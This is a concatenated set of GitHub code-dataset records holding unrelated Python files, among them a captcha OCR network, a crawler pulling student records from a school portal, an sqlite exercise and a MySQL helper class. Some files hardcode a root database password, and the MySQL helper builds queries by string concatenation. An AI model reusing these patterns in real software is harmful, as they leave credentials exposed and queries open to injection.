Groups are associated to a departure time\n # when merged, groups get associated to earlier departure times\n g.add(train, train.departure_time)\n trains_from_stop[train.departure].append(train)\n trains_to_stop[train.arrival].append(train)\n\n for stop in sorted_stops:\n # Connect each train with next one\n for train in trains_from_stop[stop]:\n next_train = get_next_train(train, trains_from_stop[train.arrival])\n if next_train:\n g.merge(train, next_train, merge_key=min)\n\n # Connect each train with previous one\n for train in trains_to_stop[stop]:\n prev_train = get_prev_train(train, trains_to_stop[train.departure])\n if prev_train:\n g.merge(train, prev_train, merge_key=min)\n\n # Sort trains in groups by time of arrival & departure\n grouped_trains = {\n time: sorted(trains, key=lambda t: (t.departure_time, t.arrival_time))\n for time, trains in g.groups()\n }\n # Sort groups by departure time of the first train\n return [trains for _, trains in sorted(grouped_trains.items())]\n","repo_name":"entwanne/horaires_trains","sub_path":"train_schedule/group.py","file_name":"group.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26257675637","text":"# This files contains your custom actions which can be used to run\n# custom Python code.\n#\n# See this guide on how to implement these action:\n# https://rasa.com/docs/rasa/core/actions/#custom-actions/\n\n\n# This is a simple example for a custom action which utters \"Hello World!\"\n\nfrom typing import Any, Text, Dict, List\n\nfrom rasa_sdk import Action, Tracker\nfrom rasa_sdk.executor import CollectingDispatcher\n\nimport mysql.connector\nimport traceback\n\nclass ActionHelloWorld(Action):\n\n def name(self) -> Text:\n return \"action_hello_world\"\n\n def run(self, dispatcher: CollectingDispatcher,\n tracker: Tracker,\n domain: Dict[Text, Any]) -> List[Dict[Text, Any]]:\n\n query = \"select text from test_table where id = 1\"\n\n try:\n mydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n passwd=\"123456789\",\n database=\"rasa\"\n )\n\n cursor = mydb.cursor()\n cursor.execute(query)\n\n results = cursor.fetchall()\n print(results)\n except:\n print(\"Error occured while connecting to database or fetching data from database. Error Trace: {}\".format(traceback.format_exc()))\n\n dispatcher.utter_message(text=\"Hello World!\",json_message=results)\n\n return []\n","repo_name":"NgocNam1512/Rasa_japanese","sub_path":"actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14708564048","text":"import pandas as pd \nimport os\nimport numpy as np\nfrom pandas import DataFrame\n\n\n\nfile_path = 'C:\\\\Users\\\\andy4\\\\Downloads\\\\'\nbase_path = os.path.join(file_path, 'long_form.xlsx')\nfile_path = 'C:\\\\Users\\\\andy4\\\\Downloads\\\\test.xlsx'\ndf = pd.read_excel(base_path)\nall_data = np.array(df)\n\n\n\nPA_follow_count = [0] * 1389\nstore_list = []\n\ncounter = 0\ncounter1 = 0\n\ndata_store = [[\"1\" for _ in range(64)] for _ in range(1389)]\n\nfinal_data_store = [[\"1\" for _ in range(64)] for _ in range(15904)]\n\nfor i in range (0,15903):\n PA_follow_count[(int(all_data[i][0]) - 1)] = PA_follow_count[(int(all_data[i][0]) - 1)] + 1\n \n\nfor i in range (0,15903):\n if all_data[i][2] == 0 or all_data[i][2] == 1 :\n \n for j in range (2,64):\n data_store[counter][j] = all_data[i][j]\n \n counter = counter + 1\n\n \nfor i in range (0,1389):\n for j in range (0,PA_follow_count[i]):\n for k in range (0,64):\n final_data_store[counter1][k] = data_store[i][k]\n \n counter1 = counter1 + 1\n \n \nDataFrame(final_data_store).to_excel(file_path, sheet_name='test', index=False, header=True)\nprint('done.')\n","repo_name":"AndyFreeeeman/Excel_Data_Process","sub_path":"Excel_Duplicate.py","file_name":"Excel_Duplicate.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19461030091","text":"import torch\nimport torch.nn as nn\nfrom fastai.vision.all import (\n L, Path, TensorCategory, Category,\n Transform, Pipeline, ToTensor, Normalize, Resize, IntToFloatTensor,\n PILImage, PILImageBW, Image, ResizeMethod, PadMode,\n Categorize,\n RandomSplitter,\n Datasets,\n Learner,\n get_image_files,\n show_image,\n Metric,\n TensorImage,\n load_learner,\n)\nimport random\nimport numpy as np\nimport re\n\n\ndef seed_all(seed_value):\n random.seed(seed_value)\n np.random.seed(seed_value)\n torch.manual_seed(seed_value)\n\n if torch.cuda.is_available():\n torch.cuda.manual_seed(seed_value)\n torch.cuda.manual_seed_all(seed_value)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n\ndef label_func(path: Path):\n \"\"\"\n Read label from file name\n :param path: path of file\n :return: label\n \"\"\"\n return list(path.name.split('.')[0])\n\n\nclass CategorizeList(Categorize):\n def __init__(self, vocab=None, add_na=False, blank='-'):\n super(CategorizeList, self).__init__(vocab=vocab, add_na=add_na, sort=False, )\n self.blank = blank\n\n @property\n def blank_idx(self):\n return self.vocab.o2i[self.blank]\n\n @property\n def n_classes(self):\n return len(self.vocab.items)\n\n def setups(self, dsets):\n dsets = sum(dsets, L(self.blank))\n super(CategorizeList, self).setups(dsets=dsets)\n\n def encodes(self, os):\n return TensorCategory([self.vocab.o2i[o] for o in os])\n\n def decodes(self, os, raw=False):\n s = ''.join([self.vocab[o] for o in os])\n if not raw:\n s = re.sub(self.blank, '', re.sub(r'(\\w)\\1+', r'\\1', s))\n\n return Category(s)\n\n\nclass BeforeBatchTransform(Transform):\n \"\"\"\n Resize image before create batch\n \"\"\"\n\n def __init__(self, height=32, width=32 * 5, keep_ratio=False, min_ratio=5.):\n super(BeforeBatchTransform, self).__init__()\n self.height, self.width = height, width\n self.keep_ratio, self.min_ratio = keep_ratio, min_ratio\n\n def encodes(self, items):\n images, *labels = zip(*items)\n\n height, width = self.height, self.width\n\n if self.keep_ratio:\n max_ratio = self.min_ratio\n for image in images:\n w, h = image.size\n max_ratio = max(max_ratio, w / h)\n width = int(np.floor(height * max_ratio))\n\n rs_tfm = Resize(size=(height, width), method=ResizeMethod.Pad, pad_mode=PadMode.Border)\n images = [rs_tfm(image) for image in images]\n return zip(images, *labels)\n\n\nclass CreateBatchTransform(Transform):\n \"\"\"\n Create batch\n \"\"\"\n\n def __init__(self):\n super(CreateBatchTransform, self).__init__()\n self.pipeline = Pipeline(funcs=[ToTensor, ])\n\n def encodes(self, items):\n images, *labels = zip(*items)\n\n # process images\n images = self.pipeline(images)\n xs = TensorImage(torch.stack(images, dim=0))\n\n # process labels\n if len(labels) > 0:\n ys = labels[0]\n y_lengths = torch.LongTensor([y.size(0) for y in ys])\n ys = torch.cat(ys, dim=0)\n return xs, (ys, y_lengths)\n return xs,\n\n\ndef conv_block(in_c, out_c, ks, stride, p, bn=False, leaky_relu=False):\n layers = list()\n layers.append(nn.Conv2d(\n in_channels=in_c,\n out_channels=out_c,\n kernel_size=ks,\n stride=stride,\n padding=p,\n ))\n\n if bn:\n layers.append(nn.BatchNorm2d(num_features=out_c))\n\n if leaky_relu:\n layers.append(nn.LeakyReLU(0.2, True))\n else:\n layers.append(nn.ReLU())\n return layers\n\n\nclass CNN(nn.Module):\n def __init__(self, in_channels=3, leaky_relu=False, ):\n super(CNN, self).__init__()\n ks = [3, 3, 3, 3, 3, 3, 2]\n s = [1, 1, 1, 1, 1, 1, 1]\n p = [1, 1, 1, 1, 1, 1, 0]\n c = [64, 128, 256, 256, 512, 512, 512]\n mp = [(2, 2), (2, 2), None, ((1, 2), 2), None, ((1, 2), 2), None]\n bn = [False, False, False, False, True, True, False]\n\n layers = []\n for i in range(len(ks)):\n in_c = in_channels if i == 0 else c[i - 1]\n layers.extend(\n conv_block(in_c=in_c, out_c=c[i], ks=ks[i], stride=s[i], p=p[i], bn=bn[i], leaky_relu=leaky_relu))\n if mp[i] is not None:\n kernel_size, stride = mp[i]\n layers.append(nn.MaxPool2d(kernel_size=kernel_size, stride=stride))\n\n self.cnn = nn.Sequential(*layers)\n\n def forward(self, x):\n out = self.cnn(x)\n return out\n\n\nclass RNN(nn.Module):\n def __init__(self, input_size, hidden_size, output_size, batch_first=False, bidirectional=True):\n super(RNN, self).__init__()\n self.input_size, self.hidden_size, self.output_size = input_size, hidden_size, output_size\n self.batch_first, self.bidirectional = batch_first, bidirectional\n\n self.lstm = nn.LSTM(\n input_size=input_size,\n hidden_size=hidden_size,\n bidirectional=bidirectional,\n batch_first=batch_first,\n )\n\n self.h2o = nn.Linear(in_features=hidden_size * 2 if bidirectional else hidden_size, out_features=output_size)\n\n def forward(self, x):\n out, _ = self.lstm(x)\n return self.h2o(out)\n\n\nclass CRNN(nn.Module):\n def __init__(self, in_channels, rnn_hidden_size, n_classes, leaky_relu=False):\n super(CRNN, self).__init__()\n self.cnn = CNN(in_channels=in_channels, leaky_relu=leaky_relu)\n self.rnn = nn.Sequential(\n RNN(\n input_size=512,\n hidden_size=rnn_hidden_size,\n output_size=rnn_hidden_size,\n batch_first=False,\n bidirectional=True\n ),\n RNN(\n input_size=rnn_hidden_size,\n hidden_size=rnn_hidden_size,\n output_size=n_classes,\n batch_first=False,\n bidirectional=True\n ),\n )\n\n def forward(self, x):\n cnn_out = self.cnn(x)\n cnn_out = cnn_out.squeeze(2).permute(2, 0, 1)\n rnn_out = self.rnn(cnn_out)\n return rnn_out\n\n\nclass CTCLoss(nn.Module):\n def __init__(self, blank=0):\n super(CTCLoss, self).__init__()\n self.ctc_loss = nn.CTCLoss(blank=blank, zero_infinity=True)\n\n def forward(self, output, target):\n T, N, C = output.size()\n target, target_lengths = target\n output_lengths = torch.full(size=(N,), fill_value=T, dtype=torch.long, device=output.device)\n output = output.log_softmax(2)\n return self.ctc_loss(output, target, output_lengths, target_lengths)\n\n\nclass AccMetric(Metric):\n def __init__(self):\n self.y_true, self.y_pred = [], []\n\n def reset(self):\n self.y_true, self.y_pred = [], []\n\n def accumulate(self, learn):\n label_categorize = learn.dls.tfms[1][-1]\n yb_pred = learn.pred.permute(1, 0, 2).argmax(dim=2)\n (yb, y_lengths), = learn.yb\n\n yb = torch.split(yb, y_lengths.cpu().tolist())\n self.y_true.extend([label_categorize.decode(y, raw=True) for y in yb])\n\n self.y_pred.extend([label_categorize.decode(y) for y in yb_pred])\n\n @property\n def value(self):\n # print(self.y_pred[:4], self.y_true[:4])\n n_correct = (np.array(self.y_pred) == np.array(self.y_true)).sum()\n return n_correct / float(len(self.y_true))\n\n @property\n def name(self):\n return 'accuracy'\n\n\n","repo_name":"thanhlt998/ocr_captcha_crnn","sub_path":"crnn.py","file_name":"crnn.py","file_ext":"py","file_size_in_byte":7568,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"2947878758","text":"import pandas as pd\nimport time\n\nfrom scrapy import Selector\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import Select\n\nclass AspenWebcrawlerCPS(object):\n\n def __init__(self):\n # Set Website to Crawl\n url = \"https://aspen.cps.edu/aspen/logon.do\"\n\n # ---------REGULAR BROWSER---------------------------------\n # self.browser = webdriver.Chrome('/usr/local/bin/chromedriver')\n #\n # ---------HEADLESS BROWSER---------------------------------\n chrome_options = webdriver.ChromeOptions()\n chrome_options.add_argument('headless')\n self.browser = webdriver.Chrome('/usr/local/bin/chromedriver',\n chrome_options=chrome_options\n )\n # ---------NAVIGATE TO WEBSITE---------------------------------\n self.browser.get(url)\n\n def login_aspen_website(self, aspen_username, aspen_password):\n \"\"\"\n\n :param aspen_username: This is the same CPS username used to log into cps email address\n :param aspen_password: This is the same CPS password used to log into cps email address\n :return: will log you into aspen website\n \"\"\"\n time.sleep(1)\n\n # fill in username and Password and click submit\n username = self.browser.find_element_by_name(\"username\")\n username.clear()\n username.send_keys(aspen_username)\n\n password = self.browser.find_element_by_name(\"password\")\n password.clear()\n password.send_keys(aspen_password)\n\n self.browser.find_element_by_id(\"logonButton\").click()\n\n time.sleep(2)\n\n def select_view(self, view):\n \"\"\"\n\n :param view: (str) this parameter takes one of three strings - \"school\", \"staff\" or \"health\".\n :return: will navigate to chosen view in aspen.\n \"\"\"\n # Selects view button\n self.browser.find_element_by_id(\"contextMenu\").click()\n\n if view.lower() == \"school\":\n self.browser.find_element_by_id(\"contextSchool\").click()\n\n elif view.lower() == \"health\":\n self.browser.find_element_by_id(\"contextHealth\").click()\n\n elif view.lower() == \"staff\":\n self.browser.find_element_by_id(\"contextStaff\").click()\n else:\n raise Exception(\"Incorrect Selection: must choose 'school', 'health', or 'staff', view\")\n\n def select_school(self, school):\n \"\"\"\n\n :param school: this parameter takes one of four strings - \"ACADEMY\", \"ASCEND\", \"BLOOM\" or \"ONE\"\n :return: wll navigate to that school page\n \"\"\"\n window_before = self.browser.window_handles[0]\n\n self.browser.find_element_by_xpath(\n '//*[@id=\"header\"]/table[1]/tbody/tr/td[3]/div/table/tbody/tr/td[2]/div/a').click()\n\n window_after = self.browser.window_handles[1]\n self.browser.switch_to.window(window_after)\n\n time.sleep(2)\n\n if school.lower() == \"academy\":\n self.browser.find_element_by_id(\"skl01000000769\").click()\n\n elif school.lower() == \"ascend\":\n self.browser.find_element_by_id(\"skl01000000088\").click()\n\n elif school.lower() == \"bloom\":\n self.browser.find_element_by_id(\"skl01000000817\").click()\n elif school.lower() == \"one\":\n self.browser.find_element_by_id(\"skl01000000853\").click()\n else:\n raise Exception(\"Incorrect Selection: must choose academy, ascend, bloom, or one\")\n\n self.browser.find_element_by_id(\"okButton\").click()\n\n self.browser.switch_to.window(window_before)\n\n def select_tab(self, top_tab_selection):\n \"\"\"\n\n :param top_page_tab: (str) can choose one of the top tabs in the school view.\n :return: Navigates to a tab within school view\n \"\"\"\n time.sleep(2)\n\n self.browser.find_element_by_id(\"topTabs\")\n self.browser.find_element_by_link_text(top_tab_selection.capitalize()).click()\n\n time.sleep(2)\n\n def select_filter(self, student_group):\n \"\"\"\n :student_group: (str) filter selection (either \"active\" which is \"All Active Students\" or \"former\" which is \"Former Students\"\n :return:\n \"\"\"\n\n # choose either active or former students\n self.browser.find_element_by_id(\"filterMenu\").click()\n\n time.sleep(1)\n\n if student_group.lower() == \"active\":\n self.browser.find_element_by_xpath('//*[@id=\"filterMenu_Option1\"]/td[2]').click()\n elif student_group.lower() == \"former\":\n self.browser.find_element_by_xpath('//*[@id=\"filterMenu_Option7\"]/td[2]').click()\n else:\n raise Exception(\"Not a valid selection\")\n\n\nclass StudentIdentifyingInfo(AspenWebcrawlerCPS):\n\n def __init__(self):\n AspenWebcrawlerCPS.__init__(self)\n\n def build_quick_report_students_tab(self, selection_list):\n \"\"\"\n\n :selection_list: (list) list of report parameters you would like to choose\n :return:\n \"\"\"\n\n # click report menu\n self.browser.find_element_by_xpath('//*[@id=\"reportsMenu\"]').click()\n\n # switch windows (quick report opens up new window)\n window_before = self.browser.window_handles[0]\n\n # select \"quick report\"\n self.browser.find_element_by_xpath(\n '/html/body/form/table/tbody/tr[2]/td/div/table[2]/tbody/tr[1]/td[2]/table[1]/tbody/tr/td[2]/div[2]/table[1]/tbody/tr[24]/td[2]').click()\n window_after = self.browser.window_handles[1]\n self.browser.switch_to.window(window_after)\n\n # click next button twice\n self.browser.find_element_by_id(\"wizNextButton\").click()\n self.browser.find_element_by_id(\"wizNextButton\").click()\n\n # Remove all fields that are already in selected field.\n select = Selector(text=self.browser.page_source)\n selected_fields = select.xpath('//*[@id=\"selectedFieldIds\"]/option//text()').extract()\n\n # collect list of all fields in \"Selected Fields\"\n selected_fields_converted = []\n for element in selected_fields:\n selected_fields_converted.append(element.strip())\n\n select = Select(self.browser.find_element_by_xpath('//*[@id=\"selectedFieldIds\"]'))\n\n # Remove element from list that you would like to leave in selected field\n # NOTE: This is done because 'School > Name' does not appear in available field if removed\n selected_fields_converted.remove('School > Name')\n\n for element in selected_fields_converted:\n select.select_by_visible_text(element)\n\n self.browser.find_element_by_id(\"removeButton\").click()\n\n # Choose elements and add to selected field\n select = Select(self.browser.find_element_by_xpath('//*[@id=\"availableFieldIds\"]'))\n\n for selection in selection_list:\n select.select_by_visible_text(selection)\n\n self.browser.find_element_by_id(\"addButton\").click()\n\n # Hit next button three times\n self.browser.find_element_by_id(\"wizNextButton\").click()\n self.browser.find_element_by_id(\"wizNextButton\").click()\n self.browser.find_element_by_id(\"wizNextButton\").click()\n\n # Click the finish button and switch to new popup window\n self.browser.find_element_by_id(\"finishButton\").click()\n window_final = self.browser.window_handles[1]\n self.browser.switch_to.window(window_final)\n\n # find table and save to html\n self.browser.find_element_by_xpath('/html/body/table')\n content = self.browser.page_source\n\n # read in html table to pd.dataframe\n custom_report = pd.read_html(content, flavor='html5lib', header=0)[0]\n\n return custom_report\n\n\nclass StudentAttendance(AspenWebcrawlerCPS):\n\n def __init__(self):\n AspenWebcrawlerCPS.__init__(self)\n\n def _cleanAttendance(self, attendance_file):\n \"\"\"\n\n :param attendance_file:\n :return:\n \"\"\"\n\n # Drop empty rows\n attendance_file.dropna(subset=['Student.1'], inplace=True)\n\n # Chose subset of columns to keep\n attendance_file = attendance_file[\n ['Student', 'Grade', 'Homeroom', 'Member', 'Present', 'Absent', 'Tardy', 'Dismiss']]\n\n # filter out renments of excel pagination\n attendance_file = attendance_file.loc[attendance_file['Student'] != \"CHARTER\"]\n attendance_file = attendance_file.loc[attendance_file['Student'] != \"Student\"]\n attendance_file = attendance_file.loc[~attendance_file['Student'].str.contains(\"Page [0-9]\", regex=True)]\n\n return (attendance_file)\n\n def pull_attendance_report(self):\n \"\"\"\n\n :return:\n \"\"\"\n\n # click report menu\n self.browser.find_element_by_xpath('//*[@id=\"reportsMenu\"]').click()\n\n # switch windows (quick report opens up new window)\n window_before = self.browser.window_handles[0]\n\n # click Student Membership under report menu\n self.browser.find_element_by_xpath('//*[@id=\"reportsMenu_Option11\"]/td[2]').click()\n window_after = self.browser.window_handles[1]\n self.browser.switch_to.window(window_after)\n\n # Format: Select CSV\n self.browser.find_element_by_id('format').click()\n self.browser.find_element_by_xpath('//*[@id=\"format\"]/option[2]').click()\n\n # Students to include: Select all students\n # self.browser.find_element_by_xpath('// *[ @ id = \"tab_0\"] / td[2] / select').click()\n # self.browser.find_element_by_xpath('//*[@id=\"tab_0\"]/td[2]/select/option[2]').click()\n\n\n # click run\n self.browser.find_element_by_xpath(\n '/html/body/table/tbody/tr[2]/td/form/table/tbody/tr[5]/td/button[1]').click()\n\n window_final = self.browser.window_handles[1]\n self.browser.switch_to.window(window_final)\n\n time.sleep(3)\n\n content = self.browser.page_source\n\n # read in html table to pd.dataframe\n custom_report = pd.read_html(content,\n flavor='html5lib',\n header=13)[0]\n\n custom_report_clean = self._cleanAttendance(custom_report)\n\n return (custom_report_clean)\n","repo_name":"kippchicago/aspen_webcrawler","sub_path":"aspen_webcrawler/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35587711892","text":"import random\nimport time\nINVERSION = 0\n\n\ndef random_int_list(start, stop, length):\n start, stop = (int(start), int(stop)) if start <= stop else (\n int(stop), int(start))\n length = int(abs(length)) if length else 0\n random_list = []\n for i in range(length):\n random_list.append(random.randint(start, stop))\n return random_list\n\n\ndef INVERSION_NUM(list):\n n = 0\n for i in range(0, len(list)):\n for j in range(i, len(list)):\n if i < j and list[i] > list[j]:\n n += 1\n return n\n\n\ndef MERGE(list, p, q, r):\n global INVERSION\n L = list[p:q]\n R = list[q:r]\n i = j = 0\n while i < len(L) and j < len(R):\n if L[i] <= R[j]:\n list[p] = L[i]\n i += 1\n else:\n list[p] = R[j]\n INVERSION += q + j - p\n j += 1\n p += 1\n if i > j:\n for j in range(j, len(R)):\n list[p] = R[j]\n p += 1\n else:\n for i in range(i, len(L)):\n list[p] = L[i]\n p += 1\n\n\ndef MERGE_SORT(list, p, r):\n if p < r - 1:\n q = int((r - p) / 2 + p)\n MERGE_SORT(list, p, q)\n MERGE_SORT(list, q, r)\n MERGE(list, p, q, r)\n return INVERSION\n\nA = random_int_list(1, 10000, 100)\nB = A[:]\nstart = time.clock()\nprint(MERGE_SORT(B, 0, len(B)))\nend = time.clock()\nprint(\"MERGE: %f s\" % (end - start))\n\nB = A[:]\nstart = time.clock()\nprint(INVERSION_NUM(B))\nend = time.clock()\nprint(\"INVERSION: %f s\" % (end - start))\n","repo_name":"mixterjim/Learn","sub_path":"Python/CLRS/2-4_Inversion.py","file_name":"2-4_Inversion.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26768210741","text":"import sqlite3\n\ncon = sqlite3.connect('pcfb.sqlite')\n\n## Creating the tables\n##con.execute(\"create table people (id integer primary key, name varchar, position varchar, phone varchar, office varchar);\")\n##con.execute(\"create table experiment ( id integer primary key, name varchar, researcher integer, description text, foreign key(researcher) references people(id))\")\n\ncon.execute('insert into people values (0, \\'Alice\\', \\'Research Director\\', 555-123-0001, \\'4b\\')')\ncon.execute('insert into people values (1, \\'Bob\\', \\'Research assistant\\', 555-123-0002, \\'17\\')')\ncon.execute('insert into people values (2, \\'Charles\\', \\'Research assistant\\', 555-123-0001, \\'24\\')')\ncon.execute('insert into people values (3, \\'David\\', \\'Research assistant\\', 555-123-0001, \\'8\\')')\ncon.execute('insert into people values (4, \\'Edwards\\', \\'Toadie\\', \\'None\\', \\'Basement\\')')\n\ncon.execute('insert into experiment values (0, \\'EBV Vaccine trial\\', 0, \\'A vaccine trial\\')')\ncon.execute('insert into experiment values (1, \\'Flu antibody study\\', 2, \\'Study of the morphology of flu antibodies\\')')\n\nr = con.execute('select * from people')\n\nfor i in r:\n print(i)\n\nr = con.execute('select p.name, e.name from people as p join experiment as e where e.researcher == p.id')\n\nfor i in r:\n print('Name: %s\\n\\tExperiment: %s' % (i[0],i[1]))\n\n## Write a script to add a new user and experiment to the database;\n## To add a new user:\ncon.execute('insert into people values (5, \\'New User\\', \\'New User\\', \\'New User\\', \\'New User\\')')\n\n## To add a new experiment:\ncon.execute('insert into experiment values (2, \\'New Experiment\\', 2, \\'New Experiment\\')')\n\n## Reassign her experiments to the new user\n## Take the experiments that were Alices and set it to a new user\ncon.execute('UPDATE experiment SET researcher = 5 WHERE id = 2;')\n\n## Remove Alice\ncon.execute('delete from people where name=\\'Alice\\'');\nprint('After deleting Alice')\n\nr = con.execute('select * from people')\n\nfor i in r:\n print(i)\n\n## Print out all of the experiment names with who owns each experiment.\nr = con.execute('select p.name, e.name from people as p join experiment as e where e.researcher == p.id')\n\nprint('Printing out experiments after deleting Alice: ')\nfor i in r:\n print('Name: %s\\n\\tExperiment: %s' % (i[0],i[1]))","repo_name":"sfidahussain/aliceIsGone","sub_path":"aliceIsGone.py","file_name":"aliceIsGone.py","file_ext":"py","file_size_in_byte":2293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34427044240","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Apr 15 17:44:20 2023\r\n\r\n@author: Jenyi\r\n\r\nFunctions for plotting UMAP and TSNEs\r\n\"\"\"\r\n\r\nimport os\r\nimport umap.umap_ as umap\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport matplotlib.colors as mcolors\r\n\r\ndef plot_umap(data, \r\n\t\t\t labels, \r\n\t\t\t title_list,\r\n\t\t\t save_path:str='./'):\r\n\t\r\n \"\"\"\r\n\tFor plotting UMAP.\r\n\tParameters:\r\n\t\tdata: data matrix of (# samples, # genes)\r\n\t\tlabels: cell label matrix of (# samples) containing cluster labels of each cell\r\n\t\ttitle_list: list with title for each plot\r\n\t\tsave_path: str path to save the UMAP to\r\n\t\t\r\n\tReturns:\r\n\t\tNone\r\n\t\r\n \"\"\"\r\n\r\n trans = umap.UMAP(n_neighbors=5, random_state=42).fit(data)\r\n color_list = list(mcolors.CSS4_COLORS.keys())\r\n\t\r\n fig, ax = plt.subplots(1, len(labels), figsize=(10,5))\r\n for i, l_arr in enumerate(labels):\r\n num_clusters = np.unique(l_arr)\r\n temp = zip(num_clusters, num_clusters)\r\n annotation_map = {k:v for k, v in temp} \t\t\r\n for n in num_clusters:\r\n temp_trans = trans.embedding_[np.where(l_arr == n)[0], :]\r\n ax[i].scatter(temp_trans[:, 0], temp_trans[:, 1], s= 5, color=color_list[int(n)], label=annotation_map[n])\r\n ax[i].axis('off')\r\n ax[i].set_title(title_list[i])\r\n\t\t\t\r\n plt.legend(bbox_to_anchor=(1.2, 1.00))\r\n\r\n plt.suptitle('UMAP of cell type clustering', fontsize=16) \r\n plt.savefig(os.path.join(save_path, 'umap.jpg'), dpi=60)\r\n\t\r\n return\r\n\r\n","repo_name":"jenyiw/MTG-SC-Clustering","sub_path":"scripts/plotumapFunctions.py","file_name":"plotumapFunctions.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24620616954","text":"## Burst Image Restoration and Enhancement\n## Akshay Dudhane, Syed Waqas Zamir, Salman Khan, Fahad Shahbaz Khan, and Ming-Hsuan Yang\n## https://arxiv.org/abs/2110.03680\n\nimport os\n\n######################################## Pytorch lightning ########################################################\n\nfrom pytorch_lightning.callbacks import ModelCheckpoint\nfrom pytorch_lightning import Trainer, seed_everything\nseed_everything(13)\n\n######################################## Model and Dataset ########################################################\n\nfrom Network import BIPNet\nfrom datasets.zurich_raw2rgb_dataset import ZurichRAW2RGB\nfrom datasets.synthetic_burst_train_set import SyntheticBurst\nfrom torch.utils.data.dataloader import DataLoader\n\n##################################################################################################################\n\nlog_dir = './logs/Track_1/'\n\nclass Args:\n def __init__(self):\n self.image_dir = \"./Zurich-RAW-to-DSLR-Dataset\"\n self.model_dir = log_dir + \"saved_model\"\n self.result_dir = log_dir + \"results\"\n self.batch_size = 1\n self.num_epochs = 100\n self.lr = 1e-4\n self.burst_size = 14\n self.NUM_WORKERS = 6\n \nargs = Args()\n\n######################################### Data loader ######################################################\n\ndef load_data(image_dir, burst_size):\n\n train_zurich_raw2rgb = ZurichRAW2RGB(root=image_dir, split='train')\n train_dataset = SyntheticBurst(train_zurich_raw2rgb, burst_size=burst_size, crop_sz=384) \n train_loader = DataLoader(train_dataset, batch_size=1, shuffle=True, drop_last=True, num_workers=args.NUM_WORKERS, pin_memory=True)\n\n test_zurich_raw2rgb = ZurichRAW2RGB(root=image_dir, split='test')\n test_dataset = SyntheticBurst(test_zurich_raw2rgb, burst_size=burst_size, crop_sz=384) \n test_loader = DataLoader(test_dataset, batch_size=1, num_workers=args.NUM_WORKERS, pin_memory=True)\n\n return train_loader, test_loader\n\n######################################### Load BIPNet ####################################################\n\nmodel = BIPNet()\nmodel.cuda()\nmodel.summarize()\n\nif not os.path.exists(args.model_dir):\n os.makedirs(args.model_dir, exist_ok=True) \n\n######################################### Training #######################################################\n\ntrain_loader, test_loader = load_data(args.image_dir, args.burst_size)\n\ncheckpoint_callback = ModelCheckpoint(\n monitor='val_psnr',\n dirpath=args.model_dir,\n filename='{epoch:02d}-{val_psnr:.2f}',\n save_top_k=3,\n save_last=True,\n mode='max',\n)\n\ntrainer = Trainer(gpus=-1,\n auto_select_gpus=True,\n accelerator='ddp',\n max_epochs=300,\n precision=16,\n gradient_clip_val=0.01,\n callbacks=[checkpoint_callback],\n benchmark=True,\n deterministic=True,\n val_check_interval=0.25,\n progress_bar_refresh_rate=100,\n profiler=\"advanced\")#,\n #resume_from_checkpoint = args.model_dir + './BIPNet.ckpt')\n\ntrainer.fit(model, train_loader, test_loader)\n","repo_name":"akshaydudhane16/BIPNet","sub_path":"Burst_Super_Resolution/BIPNet_Track_1_training.py","file_name":"BIPNet_Track_1_training.py","file_ext":"py","file_size_in_byte":3240,"program_lang":"python","lang":"en","doc_type":"code","stars":116,"dataset":"github-code","pt":"72"} +{"seq_id":"27224405054","text":"################################################################################\n\"\"\"\n@Time : 2020/12/19\n@File : db_client.py\n@Author : cenquanyu@baidu.com\n\"\"\"\nimport logging\nimport pymysql\nimport log\n\n\nclass DbClient(object):\n \"\"\"DB操作类\n \"\"\"\n def __init__(self, user, passwd):\n self.dbname = 'dbname'\n self.dbhost = 'xx.xx.xxx.xx'\n self.db = pymysql.connect(self.dbhost, user, passwd, self.dbname, charset='utf8')\n self.cursor = self.db.cursor()\n\n def execute_sql(self, sql):\n \"\"\"在db连接上执行sql语句\"\"\"\n self.cursor.execute(sql)\n\n def execute_sql_fetchall(self, sql):\n \"\"\"在db连接上执行sql语句, 并返回结果\"\"\"\n self.cursor.execute(sql)\n return self.cursor.fetchall()\n\n def execute_sql_fetchall_dictlist(self, sql):\n \"\"\"在db连接上执行sql语句, 并返回dictlist\"\"\"\n with self.db.cursor(cursor=pymysql.cursors.DictCursor) as cursor:\n cursor.execute(sql)\n return cursor.fetchall()\n\n def insert_all(self, table, *args, **kwargs):\n \"\"\"插入数据\"\"\"\n data_dict = kwargs\n length = 0\n ksql, vsql = '', ''\n for k, v in data_dict:\n if length == 0:\n ksql = \"INSERT INTO \" + table + \"(\" + k\n vsql = \"VALUES (\" + v\n else:\n ksql += ',' + k\n vsql += ',' + v\n length += 1\n ksql += \")\"\n vsql += \")\"\n sql = ksql + vsql\n try:\n self.db.ping(reconnect=True)\n self.execute_sql(sql)\n self.db.commit()\n logging.info('Insert data \\n')\n logging.info(data_dict)\n logging.info('---- Data Insert success ----')\n except Exception as e:\n logging.error(e)\n self.db.rollback()\n self.db.close()\n\n def insert(self, sql):\n \"\"\"插入数据(使用sql)\"\"\"\n try:\n self.db.ping(reconnect=True)\n self.execute_sql(sql)\n self.db.commit()\n except Exception as e:\n logging.error(e)\n self.db.rollback()\n 